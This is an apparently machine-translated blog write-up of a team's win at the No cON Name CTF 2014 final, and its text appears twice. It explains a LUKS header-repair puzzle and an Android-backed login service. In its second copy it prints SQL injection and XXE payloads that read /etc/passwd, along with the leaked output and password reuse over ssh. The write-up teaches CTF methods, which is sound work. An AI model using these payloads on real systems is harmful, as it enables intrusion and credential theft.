No cON Name CTF 2014 Final
From October 30 to November 1, the International Conference on Information Security No cON Name 2014 was held in Barcelona, within the framework of which the Capture The Flag competition was held for the second time. The team of the University of Innopolis BalalaikaCr3w took part in this competition and won first place. Under the cut our story about how it was, a few examples of tasks and thanks to those who helped us in this.
CTF area during the final
For those who do not know what the competition " Capture The Flag ". This is a kind of programming programming competition, only here one often has to not write his own code, but to exploit errors in someone else’s. Tasks imitate vulnerabilities encountered in real programs, for example, buffer overflow, "self-made" cryptography, unshielded pasting of text in a SQL query, or require actions similar to those used in computer incidents investigation: log analysis, search for deleted files and hidden data . The result of a correctly completed task is a text string - a flag . The received flags are given to the organizers of the competition for scoring points to the team.
Most of these competitions are online and free to register. The largest of them also have the final round, where several teams (about 10), who have taken the top lines in the online tour, gather at the organizers site to compete with each other for first place in equal conditions (regardless of time zone).
')
Last year, No ConC Name CTF was organized in conjunction with Facebook. Despite the rather strange qualifying round, which consisted of only three tasks, the final turned out to be interesting and worthy of attention. The format of last year’s finals was somewhat uncharacteristic of hacking CTF competitions: there were tasks, for the solution of each of which a certain amount of points were given at the same time, and there were also neutral services located on the servers of the organizers. During the exploitation of a vulnerability in one of the services, the team needed to write its name in a specific file on the server. Once in a specified period of time, the organizers checking program took the name of the team from this file and awarded it a certain number of points.
The team of BalalaikaCr3w took the 3rd place last year
This year, the qualifying round lasted 24 hours and consisted of 10 tasks, 9 of which we decided during the first hours of the game. The last task called Explicit, we managed to solve only 5-6 hours before the end of the CTF. Analysis of some assignments of the qualifying stage can be found in our blog .
The finals, as you already understood, were held in Barcelona, on the territory of the Ramón Llull University . Conditions: 8 hours, 16 tasks. The price of the job is from 150 to 400 points. One of the tasks is a general interactive service, the “capture” of which brings the team 50 points every 10 minutes.
Next, we describe a couple of tasks and our approach to solving them. This text was conceived not so much for information security fans, but for people who are interested in what they are doing at such competitions, so we simplified some of the points by sacrificing detail. For detailed debugs, there are writeup blogs on teams.
Task: " Dig deep into the file and find the flag ", given a file of about 95 MB in size.
One of the most enjoyable moments on any CTF is the study of something new. This time, we needed to understand the LUKS disk encryption format. The fact that the attached file is just such a virtual encrypted disk, we quickly find out using the hex editor and searching the Internet for the string “ LUKs ” ( 4C 55 4B 73 ).
The standard cryptsetup utility for this disk format refused to work with the file from the job, displaying the message " Device hiddentation is not a valid LUKS device ". From the format description, we learn that the correct signature at the beginning of the file should be “ LUKS ” ( 4C 55 4B 53 ). Fix, now the file is opened, but we do not have a key from the encrypted disk.
After reading the documentation, we find out that the disk is encrypted with the master key , but this key itself is not given to the user, but is stored in several copies in an encrypted form in the disk header. To decrypt each copy of the master key, use its own user key. Such user keys can be up to eight, according to the number of specially designated cells in the disk header.
In our case, the cryptsetup utility asserted that all eight cells are empty. But looking carefully at the hex editor at the place where the cells are located, you can see that there is some data in one of them:
The first four bytes of the record with the value 0x0000DEAD indicate that it is inactive. Replacing them with 0x00AC71F3 activate this entry. Now we need to find the user key for this cell.
Immediately after the header, in the place where zero bytes are usually added for alignment, the text with some special characters is contained:
" Try \ x19 most common passwd in \ x07 \ xDD ", which can be interpreted as: " Try the 25 most popular passwords of 2013. " However, none of the 25 most popular passwords allowed to open the container.
The next step, unfortunately, turned out to be a “ guessing game” (the most unloved category of tasks for all CTF teams). We are lucky that the cryptsetup utility created the same containers as the containers in the task. Having created the container ourselves, we noticed that the entry for the last key in the “ key material offset ” field contains the value 0x0708 , but in the file from the task it is 0x0608 :
Replacing with the correct value allows you to open the container with the password " shadow ".
But this is not the whole solution. The decrypted container contained a disk image with three partitions. The hint files in the first two sections talked about what to look for in the third. The third section did not contain any files at all. As the organizers later explained to us, for some offset there was an NTFS partition on which there was a file. However, we used the first CTF rule: " strings everywhere ". Among the heaps of lines from the file we find one very interesting:
As a result, after applying rot13, we get the flag:
NCNd986942b809daa32a6987a7422771a53f59e5a1f02ed700cce43c5196aba749e .
Task: given the application for Android in the form of a .apk file.
There are a lot of articles on Habré how to decompress such files, so we will not dwell on this. After decompiling, we find out that the application connects to the 10.210.6.1 server on the game subnet and sends the following HTTP request:
At this point, we have two operating options:
1. SQL injection. Compare two queries (no headers):
Normal request:
Answer:
Injection request with login:
Answer:
2. Attack XXE (XML eXternal Entity)
Request:
Answer:
We try to sort out with the help of XXE various variants of the file name with the flag ( flag , flag.txt , / flag , /flag.txt , etc.), as well as various configuration files (for example, /etc/nginx/nginx.conf ), but we find nothing interesting.
We return to the operation of SQL injection. Using the SUBSTR () function, we select a login and password, as it turned out, the only user in the database. Try to log in under it:
Server response:
Oh these trolls
Alas, this is not the answer. Sometimes the CTF tasks are arranged in such a way that, at first glance, the correct solution can lead to a false result. Honeypot , so to speak.
There was nothing else in the database, so I had to go back to XXE. Looking at the ch6 user’s .bash_history file, we saw some suspicious lines:
It turned out that tjG86fKwJ2yZ is the ch6 user's password. Next thing is small:
Flag: NcN_f86c108687fd25eea4f8ba10dd4c9bad8fa70a9f74179caf617364965cb8cb4f
I would like to note that this is not a very thoughtful move on the part of the organizers, because the rights were set in such a way that access via ssh allowed you to clean .bash_history , add your public keys to authorized_keys , and also completely deny access to other teams.
It is also noteworthy that the Osiris host (whose address could be obtained through XXE from the / etc / hosts file ) was not directly accessible from the command computers. It was possible to access it only from the server 10.210.6.1.
Nevertheless, the task turned out to be difficult and, in general, interesting, because it required skills in two categories at once (reverse + web).
We practically took the initiative from the first minutes, having made first blood :
The first task we solved was simple enough steganography called WireTap .
By the middle of the day, the home team, the most experienced Spanish team int3pids, opened the score with their points, capturing the neutral service dragons . The intrigue was growing, since int3pids received 50 points every 10 minutes for the captured service, while simultaneously solving other tasks and getting points for them. A couple of hours later, the Ukrainian dcua team entered the fight, deciding on a task called vodka , but it was already difficult for them to claim victory: our BalalaikaCr3w team and the int3pids team were already too far ahead.
As a result, we managed to hold out on the top line of the skorboard until the very end of the competition:
Commands with a score of zero were not displayed on the skorboard
It is worth noting that the NcN CTF in Barcelona takes place only the second year and is not as popular and well-known as some other CTF competitions. However, the quality of the event is growing. I would like to wish the association No cON Name not to stop at what has been accomplished, but to continue moving on, prepare even more interesting tasks, attract more sponsors and raise the level and prestige of their conference and CTF.
The BalalaikaCr3w team is grateful to Innopolis University for the support and organization of our trip to the final. Innopolis is a new university with a focus on IT and robotics. Starting next year, Cyber Security magistracy is planned to open, and they actively attract young professionals in the field of information security.
Our team is also grateful to the companies “Aktiv” and “ABBYY Language Services” for the feasible support of their employees to participate in this event.
Analysis of tasks from the final No cON Name CTF 2014 and other competitions, read our blog: ctfcrew.org
Information about upcoming CTFs and in general about all the events in the CTF world on the main resource of all teams: ctftime.org .
CTF area during the final
What is CTF
For those who do not know what the competition " Capture The Flag ". This is a kind of programming programming competition, only here one often has to not write his own code, but to exploit errors in someone else’s. Tasks imitate vulnerabilities encountered in real programs, for example, buffer overflow, "self-made" cryptography, unshielded pasting of text in a SQL query, or require actions similar to those used in computer incidents investigation: log analysis, search for deleted files and hidden data . The result of a correctly completed task is a text string - a flag . The received flags are given to the organizers of the competition for scoring points to the team.
Most of these competitions are online and free to register. The largest of them also have the final round, where several teams (about 10), who have taken the top lines in the online tour, gather at the organizers site to compete with each other for first place in equal conditions (regardless of time zone).
')
A bit of history: "No cON Name CTF 2013"
Last year, No ConC Name CTF was organized in conjunction with Facebook. Despite the rather strange qualifying round, which consisted of only three tasks, the final turned out to be interesting and worthy of attention. The format of last year’s finals was somewhat uncharacteristic of hacking CTF competitions: there were tasks, for the solution of each of which a certain amount of points were given at the same time, and there were also neutral services located on the servers of the organizers. During the exploitation of a vulnerability in one of the services, the team needed to write its name in a specific file on the server. Once in a specified period of time, the organizers checking program took the name of the team from this file and awarded it a certain number of points.
The team of BalalaikaCr3w took the 3rd place last year
Qualifying round “No cone Name 2014”
This year, the qualifying round lasted 24 hours and consisted of 10 tasks, 9 of which we decided during the first hours of the game. The last task called Explicit, we managed to solve only 5-6 hours before the end of the CTF. Analysis of some assignments of the qualifying stage can be found in our blog .
Finals “No cON Name 2014”
The finals, as you already understood, were held in Barcelona, on the territory of the Ramón Llull University . Conditions: 8 hours, 16 tasks. The price of the job is from 150 to 400 points. One of the tasks is a general interactive service, the “capture” of which brings the team 50 points every 10 minutes.
Next, we describe a couple of tasks and our approach to solving them. This text was conceived not so much for information security fans, but for people who are interested in what they are doing at such competitions, so we simplified some of the points by sacrificing detail. For detailed debugs, there are writeup blogs on teams.
HIDDENtation Task (300 points)
Task: " Dig deep into the file and find the flag ", given a file of about 95 MB in size.
One of the most enjoyable moments on any CTF is the study of something new. This time, we needed to understand the LUKS disk encryption format. The fact that the attached file is just such a virtual encrypted disk, we quickly find out using the hex editor and searching the Internet for the string “ LUKs ” ( 4C 55 4B 73 ).
The standard cryptsetup utility for this disk format refused to work with the file from the job, displaying the message " Device hiddentation is not a valid LUKS device ". From the format description, we learn that the correct signature at the beginning of the file should be “ LUKS ” ( 4C 55 4B 53 ). Fix, now the file is opened, but we do not have a key from the encrypted disk.
After reading the documentation, we find out that the disk is encrypted with the master key , but this key itself is not given to the user, but is stored in several copies in an encrypted form in the disk header. To decrypt each copy of the master key, use its own user key. Such user keys can be up to eight, according to the number of specially designated cells in the disk header.
In our case, the cryptsetup utility asserted that all eight cells are empty. But looking carefully at the hex editor at the place where the cells are located, you can see that there is some data in one of them:
The first four bytes of the record with the value 0x0000DEAD indicate that it is inactive. Replacing them with 0x00AC71F3 activate this entry. Now we need to find the user key for this cell.
Immediately after the header, in the place where zero bytes are usually added for alignment, the text with some special characters is contained:
" Try \ x19 most common passwd in \ x07 \ xDD ", which can be interpreted as: " Try the 25 most popular passwords of 2013. " However, none of the 25 most popular passwords allowed to open the container.
The next step, unfortunately, turned out to be a “ guessing game” (the most unloved category of tasks for all CTF teams). We are lucky that the cryptsetup utility created the same containers as the containers in the task. Having created the container ourselves, we noticed that the entry for the last key in the “ key material offset ” field contains the value 0x0708 , but in the file from the task it is 0x0608 :
Replacing with the correct value allows you to open the container with the password " shadow ".
But this is not the whole solution. The decrypted container contained a disk image with three partitions. The hint files in the first two sections talked about what to look for in the third. The third section did not contain any files at all. As the organizers later explained to us, for some offset there was an NTFS partition on which there was a file. However, we used the first CTF rule: " strings everywhere ". Among the heaps of lines from the file we find one very interesting:
rot13:APAq986942o809qnn32n6987n7422771n53s59r5n1s02rq700ppr43p5196non749r As a result, after applying rot13, we get the flag:
NCNd986942b809daa32a6987a7422771a53f59e5a1f02ed700cce43c5196aba749e .
Task demDROID (400 points)
Task: given the application for Android in the form of a .apk file.
There are a lot of articles on Habré how to decompress such files, so we will not dwell on this. After decompiling, we find out that the application connects to the 10.210.6.1 server on the game subnet and sends the following HTTP request:
POST / HTTP/1.0 Content-Type: text/xml User-Agent: denDROID 1.0 Host: 10.210.6.1 <login><username>{$username}</username><password>{$password}</password></login>
At this point, we have two operating options:
1. SQL injection. Compare two queries (no headers):
Normal request:
<login><username>balalaika</username><password>asd</password></login>
Answer:
<response>User balalaika is not found!</response>
Injection request with login:
<login><username>q' OR 'x'='x</username><password>asd</password></login>
Answer:
<response>Invalid password for user q' OR 'x'='x!</response>
2. Attack XXE (XML eXternal Entity)
Request:
<!DOCTYPE login [<!ENTITY xxe SYSTEM "/etc/passwd">]><login><username>q' OR 1=1 /*&xxe;</username><password>&xxe;</password></login>
Answer:
<response>Invalid password for user q' OR 1=1 /*root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh # sync:x:4:65534:sync:/bin:/bin/sync # games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh # lp:x:7:7:lp:/var/spool/lpd:/bin/sh # mail:x:8:8:mail:/var/mail:/bin/sh # news:x:9:9:news:/var/spool/news:/bin/sh # uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin messagebus:x:102:103::/var/run/dbus:/bin/false ch6:x:1000:1000::/home/ch6:/bin/sh !</response>
We try to sort out with the help of XXE various variants of the file name with the flag ( flag , flag.txt , / flag , /flag.txt , etc.), as well as various configuration files (for example, /etc/nginx/nginx.conf ), but we find nothing interesting.
We return to the operation of SQL injection. Using the SUBSTR () function, we select a login and password, as it turned out, the only user in the database. Try to log in under it:
<login><username>l3wlzHunt3r</username><password>mw4h4h4</password></login>
Server response:
<response>Welcome, l3wlzHunt3r! Good job! But your flag is in another castle!</response>
Oh these trolls
Alas, this is not the answer. Sometimes the CTF tasks are arranged in such a way that, at first glance, the correct solution can lead to a false result. Honeypot , so to speak.
There was nothing else in the database, so I had to go back to XXE. Looking at the ch6 user’s .bash_history file, we saw some suspicious lines:
... tjG86fKwJ2yZ ... sudo vim /etc/hosts ping Wopr sudo vim /etc/hosts ping Osiris nc Osiris 1135 nc Osiris 11235 curl Osiris 11235 curl Osiris:11235 ...
It turned out that tjG86fKwJ2yZ is the ch6 user's password. Next thing is small:
ssh ch6@10.210.6.1 tjG86fKwJ2yZ $ curl Osiris:11235 NcN_f86c108687fd25eea4f8ba10dd4c9bad8fa70a9f74179caf617364965cb8cb4f
Flag: NcN_f86c108687fd25eea4f8ba10dd4c9bad8fa70a9f74179caf617364965cb8cb4f
I would like to note that this is not a very thoughtful move on the part of the organizers, because the rights were set in such a way that access via ssh allowed you to clean .bash_history , add your public keys to authorized_keys , and also completely deny access to other teams.
It is also noteworthy that the Osiris host (whose address could be obtained through XXE from the / etc / hosts file ) was not directly accessible from the command computers. It was possible to access it only from the server 10.210.6.1.
Nevertheless, the task turned out to be difficult and, in general, interesting, because it required skills in two categories at once (reverse + web).
Chronology
We practically took the initiative from the first minutes, having made first blood :
The first task we solved was simple enough steganography called WireTap .
By the middle of the day, the home team, the most experienced Spanish team int3pids, opened the score with their points, capturing the neutral service dragons . The intrigue was growing, since int3pids received 50 points every 10 minutes for the captured service, while simultaneously solving other tasks and getting points for them. A couple of hours later, the Ukrainian dcua team entered the fight, deciding on a task called vodka , but it was already difficult for them to claim victory: our BalalaikaCr3w team and the int3pids team were already too far ahead.
As a result, we managed to hold out on the top line of the skorboard until the very end of the competition:
Commands with a score of zero were not displayed on the skorboard
It is worth noting that the NcN CTF in Barcelona takes place only the second year and is not as popular and well-known as some other CTF competitions. However, the quality of the event is growing. I would like to wish the association No cON Name not to stop at what has been accomplished, but to continue moving on, prepare even more interesting tasks, attract more sponsors and raise the level and prestige of their conference and CTF.
Thanks
The BalalaikaCr3w team is grateful to Innopolis University for the support and organization of our trip to the final. Innopolis is a new university with a focus on IT and robotics. Starting next year, Cyber Security magistracy is planned to open, and they actively attract young professionals in the field of information security.
Our team is also grateful to the companies “Aktiv” and “ABBYY Language Services” for the feasible support of their employees to participate in this event.
Links
Analysis of tasks from the final No cON Name CTF 2014 and other competitions, read our blog: ctfcrew.org
Information about upcoming CTFs and in general about all the events in the CTF world on the main resource of all teams: ctftime.org .
Source: https://habr.com/ru/post/245011/
All Articles